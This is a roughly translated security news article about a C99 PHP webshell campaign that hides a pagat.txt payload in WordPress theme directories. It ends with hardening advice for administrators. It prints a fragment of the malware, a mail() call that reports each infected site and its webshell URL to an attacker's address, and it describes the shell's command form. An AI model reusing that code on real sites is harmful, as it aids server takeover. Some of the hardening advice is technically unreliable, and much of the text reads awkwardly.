C99 PHP Webshell attack intensifies, a large number of WordPress sites are threatened

Recently, IBM's Management Security Services (MSS) team issued a warning that it monitored the use of C99 php Webshell,Lot WordPressSite suffered a new attack, remind the WordPress site administrator should promptly scan and repair site vulnerabilities.

According to the IBM MSS team's long-term monitoring and analysis of malicious events, security researchers found that in the past two months, there has been a class C99 Webshell caused by traffic anomalies, of which the number of events monitored in February was 404, and in March, 588 pieces, as follows,

We know that through Webshell, malicious files can be uploaded to the Web server or executed using the command to pass to the server. It can be written in a variety of programming language codes, from PHP to ASP, from JavaScript to Ruby, allowing attackers to control the server, while C99 Webshell is often used by attackers.

Beware of pagat.txt files

The IBM MSS Security team says attackers often exploit the security vulnerabilities of site plug-ins to infect them through C99 Webshell. During the initial infection phase, the Webshell script was uploaded to the server and stored on the server as a text file, which, according to the study, is typically named Pagat.txt. In this file, IBM security researchers have also found a confusing PHP source code, the relevant code snippet is as follows,

In order to make the code more ambiguous and to make detection of the infection behavior more difficult, the attacker did not place the above text file in the root directory of the server or in the directory folder of the plugin. In most cases, the Pagat.txt file is typically stored in the following path.

"Http://www.website-name.com/wp-content/themes/twentythirteen/pagat.txt"

We can also according to this path, its own wordpress site server to check to see if there are suspicious files.

Attack steps

The attacker finds a path to transfer the text content to the server's PHP interpreter. After executing malicious code, in a nutshell, the following actions are typically performed,

The first is to send an email to the attacker to tell the current location of the infected site through the content of the message. This message is a mailbox that is sent to a Gmail address that contains the domain name of the Web site and the URL of the Webshell.

Mail ("XXXXX@gmail.com", "$body", "Hasil Bajakan hxxp://$web $inj

Next, through the code contained in the Pagat.txt file, create a form page in the Site directory, as follows,

Finally, the attacker accesses the newly created form file through a browser and can pass commands or upload files to the server, and access the page as follows.

As shown, Webshell can allow an attacker to run terminal commands on the server or upload new files to the site, and new files can be more intrusive webshells,ddos clients, Bitcoin miner software, or other malicious software.

According to the IBM MSS team, as of April 12, 2016, only through the Google search engine simple query, found that there are about 32,000 WordPress site pagat.txt files.

Security recommendations

Based on the current situation, it is recommended that the site administrator can do the following

1, edit the php.ini file, disable the Base64 decoding function. In the php.ini file, locate the relevant configuration statement "Disable_functions =" and set the statement to "disable_functions = Eval,base64_decode, gzinflate";

2. Change the name of the upload folder. WordPress allows the upload program to write files to the upload folder, if the user still use the default name, the attacker can easily speculate on the specific path of the upload file, so that the attacker to upload a php file containing shell scripts is greatly reduced;

3, the installation of a strong availability of security plug-ins, such as Wordfence WordPress plugin;

4. Conduct a security scan. We recommend the use of open source scanning tools, upload files for full-volume scanning, where you can use the Scanning Tool modsecurity, while the Awvs or WordPress security scanner to scan the site, timely detection of loopholes, and repair and reinforcement;

5, if found that the site has been infected, it is recommended to change the site in a timely manner all the management account password, and inform the site users for password changes.

* Reference Source: Softpedia, Securityintelligence, FB small Troy Compilation, reproduced please specify from FREEBUF hackers and Geeks (freebuf.com)

